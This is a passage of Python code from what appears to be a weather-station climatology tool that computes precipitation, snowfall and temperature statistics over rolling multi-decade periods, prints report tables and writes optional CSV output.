metclmt[y]["prcpDAYS"] climo30yrs[c]["total_days"] += metclmt[y]["recordqty"] if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) elif metclmt[y]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][0] = metclmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) if metclmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) elif metclmt[y]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][0] = metclmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) if sum(metclmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["prcp"]) > climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][0] = sum(metclmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_max"][1] = [] climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) if sum(metclmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) elif sum(metclmt[y]["prcp"]) < climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][0] = sum(metclmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_min"][1] = [] climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) # SNOW alltime["snow"].append(sum(metclmt[y]["snow"])) alltime["snowPROP"]["days"] += metclmt[y]["snowDAYS"] if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["snowDAYS"] == alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][1].append(y) elif metclmt[y]["snowDAYS"] > alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][0] = 
metclmt[y]["snowDAYS"] alltime["snowPROP"]["year_max_days"][1] = [] alltime["snowPROP"]["year_max_days"][1].append(y) if sum(metclmt[y]["snow"]) == alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["snow"]) > alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][0] = sum(metclmt[y]["snow"]) alltime["snowPROP"]["year_max"][1] = [] alltime["snowPROP"]["year_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(metclmt[y]["snow"])) climo30yrs[c]["snowPROP"]["days"] += metclmt[y]["snowDAYS"] if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["snowDAYS"] == climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) elif metclmt[y]["snowDAYS"] > climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][0] = metclmt[y]["snowDAYS"] climo30yrs[c]["snowPROP"]["year_max_days"][1] = [] climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) if sum(metclmt[y]["snow"]) == climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["snow"]) > climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][0] = sum(metclmt[y]["snow"]) climo30yrs[c]["snowPROP"]["year_max"][1] = [] climo30yrs[c]["snowPROP"]["year_max"][1].append(y) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in metclmt[y]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(metclmt[y]["tempAVGlist"]) > excludeyear_tavg: alltime["tempAVGlist"].append(mean(metclmt[y]["tempAVGlist"])) if mean(metclmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) > 
alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][0] = mean(metclmt[y]["tempAVGlist"]) alltime["tavgPROP"]["year_max"][1] = [] alltime["tavgPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) < alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][0] = mean(metclmt[y]["tempAVGlist"]) alltime["tavgPROP"]["year_min"][1] = [] alltime["tavgPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(metclmt[y]["tempAVGlist"]) > excludeyear_tavg: climo30yrs[c]["tempAVGlist"].append(mean(metclmt[y]["tempAVGlist"])) if mean(metclmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][0] = mean(metclmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_max"][1] = [] climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][0] = mean(metclmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_min"][1] = [] climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) # TMAX for x in metclmt[y]["tmax"]: alltime["tmax"].append(x) if len(metclmt[y]["tmax"]) > excludeyear: if mean(metclmt[y]["tmax"]) == alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmax"]) > alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][0] = 
mean(metclmt[y]["tmax"]) alltime["tmaxPROP"]["year_max"][1] = [] alltime["tmaxPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmax"]) == alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tmax"]) < alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][0] = mean(metclmt[y]["tmax"]) alltime["tmaxPROP"]["year_min"][1] = [] alltime["tmaxPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(metclmt[y]["tmax"]) > excludeyear: if mean(metclmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmax"]) > climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][0] = mean(metclmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_max"][1] = [] climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tmax"]) < climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][0] = mean(metclmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_min"][1] = [] climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) # TMIN for x in metclmt[y]["tmin"]: alltime["tmin"].append(x) if len(metclmt[y]["tmin"]) > excludeyear: if mean(metclmt[y]["tmin"]) == alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmin"]) > alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][0] = mean(metclmt[y]["tmin"]) alltime["tminPROP"]["year_max"][1] = [] alltime["tminPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmin"]) == alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][1].append(y) elif 
mean(metclmt[y]["tmin"]) < alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][0] = mean(metclmt[y]["tmin"]) alltime["tminPROP"]["year_min"][1] = [] alltime["tminPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(metclmt[y]["tmin"]) > excludeyear: if mean(metclmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmin"]) > climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][0] = mean(metclmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_max"][1] = [] climo30yrs[c]["tminPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tmin"]) < climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][0] = mean(metclmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_min"][1] = [] climo30yrs[c]["tminPROP"]["year_min"][1].append(y) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for All Meteorological Years on Record") print("City: {}, {}".format(metclmt["station"],metclmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) 
# Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^11} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["year_max_days"][0], alltime["prcpPROP"]["year_max_days"][1][0] if len(alltime["prcpPROP"]["year_max_days"][1]) == 1 else len(alltime["prcpPROP"]["year_max_days"][1]), alltime["prcpPROP"]["year_min_days"][0], alltime["prcpPROP"]["year_min_days"][1][0] if len(alltime["prcpPROP"]["year_min_days"][1]) == 1 else len(alltime["prcpPROP"]["year_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["year_max"][0],2), alltime["prcpPROP"]["year_max"][1][0] if len(alltime["prcpPROP"]["year_max"][1]) == 1 else len(alltime["prcpPROP"]["year_max"][1]), round(alltime["prcpPROP"]["year_min"][0],2), alltime["prcpPROP"]["year_min"][1][0] if len(alltime["prcpPROP"]["year_min"][1]) == 1 else len(alltime["prcpPROP"]["year_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["year_max_days"][0], alltime["snowPROP"]["year_max_days"][1][0] if len(alltime["snowPROP"]["year_max_days"][1]) == 1 else len(alltime["snowPROP"]["year_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["year_max"][0],2), alltime["snowPROP"]["year_max"][1][0] if len(alltime["snowPROP"]["year_max"][1]) == 1 else len(alltime["snowPROP"]["year_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) 
#print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["year_max_days"][0], climo30yrs[c]["prcpPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]), climo30yrs[c]["prcpPROP"]["year_min_days"][0], climo30yrs[c]["prcpPROP"]["year_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["year_max"][0],2), climo30yrs[c]["prcpPROP"]["year_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max"][1]), round(climo30yrs[c]["prcpPROP"]["year_min"][0],2), climo30yrs[c]["prcpPROP"]["year_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["year_max_days"][0], climo30yrs[c]["snowPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["year_max"][0],2), climo30yrs[c]["snowPROP"]["year_max"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max"][1]))) except 
Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["year_max"][0],1), alltime["tavgPROP"]["year_max"][1][0] if len(alltime["tavgPROP"]["year_max"][1]) == 1 else len(alltime["tavgPROP"]["year_max"][1]), round(alltime["tavgPROP"]["year_min"][0],1), alltime["tavgPROP"]["year_min"][1][0] if len(alltime["tavgPROP"]["year_min"][1]) == 1 else len(alltime["tavgPROP"]["year_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["year_max"][0],1), alltime["tmaxPROP"]["year_max"][1][0] if len(alltime["tmaxPROP"]["year_max"][1]) == 1 else len(alltime["tmaxPROP"]["year_max"][1]), round(alltime["tmaxPROP"]["year_min"][0],1), alltime["tmaxPROP"]["year_min"][1][0] if len(alltime["tmaxPROP"]["year_min"][1]) == 1 else len(alltime["tmaxPROP"]["year_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["year_max"][0],1), alltime["tminPROP"]["year_max"][1][0] if len(alltime["tminPROP"]["year_max"][1]) == 1 else len(alltime["tminPROP"]["year_max"][1]), 
round(alltime["tminPROP"]["year_min"][0],1), alltime["tminPROP"]["year_min"][1][0] if len(alltime["tminPROP"]["year_min"][1]) == 1 else len(alltime["tminPROP"]["year_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["year_max"][0],1), climo30yrs[c]["tavgPROP"]["year_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_max"][1]), round(climo30yrs[c]["tavgPROP"]["year_min"][0],1), climo30yrs[c]["tavgPROP"]["year_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["year_max"][0],1), climo30yrs[c]["tmaxPROP"]["year_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_max"][1]), round(climo30yrs[c]["tmaxPROP"]["year_min"][0],1), climo30yrs[c]["tmaxPROP"]["year_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["year_max"][0],1), climo30yrs[c]["tminPROP"]["year_max"][1][0] if len(climo30yrs[c]["tminPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_max"][1]), round(climo30yrs[c]["tminPROP"]["year_min"][0],1), climo30yrs[c]["tminPROP"]["year_min"][1][0] if len(climo30yrs[c]["tminPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if 
output == True: newfn = "metYearReport_Mar-Feb_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period (March to February)","PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") 
w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def customReport(m1,d1,*date2,climatology=30,increment=5,output=False): """Detailed Climatological Report a defined custom period of time and can be of variable length. Args: m1: The start month of the custom period. d1: The start day of the custom period. Args (optional; represented by *date2) m2: The end month of the custom period d2: The end day of the custom period * If these variables are not given, the end date defaults to Dec. 31. Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. 
This could be opened in a spreadsheet program for further analysis Examples: customReport(2,14,5,31) -> Returns a 30-yr, 5-yr incremented climatological report records between Feb 14 and May 31. customReport(7,1,climatology=10) -> Returns a 5-yr incremented, 10yr climatological report for records between July 1 and Dec 31 (the latter-half of the year, essentially). customReport(3,21,3,20,increment=1) -> Returns a 1-yr incremented, 30-yr climatology report for the period of Mar 21 thru Mar 20 of the following year. This would be a good substitute for assessing astronomical years on the basis of the Spring Equinox. customReport(1,1,6,31,output=True) -> Returns a 5-yr incremented, 30 yr climatology for dates between Jan 1 and Jun 30 (the first half of the calendar year). It also outputs a CSV report of the findings. """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in metclmt.keys() if type(x) == int] valid_yrs.sort() if any(type(x) != int for x in [m1,d1]): return print("*** OOPS! Ensure that only integers are entered ***") if len(date2) == 0: pass elif len(date2) != 2: return print("*** OOPS! For the 2nd (optional) date, ensure only a Month and Date are entered ***") elif any(type(x) != int for x in [date2[0],date2[1]]): return print("*** OOPS! Ensure that only integers are entered ***") if len(date2) == 2: m2 = date2[0] d2 = date2[1] else: m2 = 12 d2 = 31 if m2 == m1: if d2 == d1: return print("*** OOPS! Ensure different dates! 
***") if m1 == 2 and d1 == 29: d1 = 28 if m2 == 2 and d2 == 29: d2 = 28 # Determine total length of period (used for exclusion calculation) s = datetime.date(1900,m1,d1) test = datetime.date(1900,m2,d2) if test > s: e = test else: e = datetime.date(1901,m2,d2) timelength = (e - s).days + 1 if timelength < 7: EXCLD = 1 elif timelength == 7: EXCLD = excludeweek elif timelength in [28,29,30,31]: EXCLD = excludemonth elif timelength >= 350: EXCLD = excludeyear else: EXCLD = round(excludecustom * timelength) print("EXCLUDING PERIODS OF <= {} DAYS".format(EXCLD)) climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"e_max_days":[-1,[]],"e_min_days":[999,[]],"e_max":[-1,[]],"e_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"e_max_days":[-1,[]],"e_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmax": [],"tmaxPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmin": [],"tminPROP":{"e_max":[-999,[]],"e_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"e_max_days":[-1,[]],"e_min_days":[999,[]],"e_max":[-1,[]],"e_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"e_max_days":[-1,[]],"e_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmax": [],"tmaxPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmin": [],"tminPROP":{"e_max":[-999,[]],"e_min":[999,[]]}} e = {} # Will hold the date-to-date (represented by a parent year) stats print("*** Be Patient. 
This could take a few moments ***") for YYYY in valid_yrs: startday = datetime.date(YYYY,m1,d1) incr_day = startday if m2 < m1: endday = datetime.date(YYYY+1,m2,d2) # if end month is less, the results will bleed into the following year elif m2 == m1: # Deals with if the months of the dates are exactly the same if d2 < d1: endday = datetime.date(YYYY+1,m2,d2) # like above, if month is the same, but date is less, results will bleed into following year else: endday = datetime.date(YYYY,m2,d2) # OTHERWISE, it is assumed the same year else: endday = datetime.date(YYYY,m2,d2) # If month2 is > than month 1, the active year will be used if endday.year > max(valid_yrs): break #if YYYY not in e: e[YYYY] = {"recordqty":0, "prcp":[],"prcpDAYS":0,"snow":[],"snowDAYS":0, "tempAVGlist":[],"tmax":[],"tmin":[]} while incr_day <= endday: y = incr_day.year; m = incr_day.month; d = incr_day.day if y in clmt and m in clmt[y] and d in clmt[y][m]: e[YYYY]["recordqty"] += 1 # PRCP if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: if float(clmt[y][m][d].prcp) > 0: e[YYYY]["prcp"].append(round(float(clmt[y][m][d].prcp),2)) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1 if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp == "" and clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1 # SNOW if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: if float(clmt[y][m][d].snow) > 0: 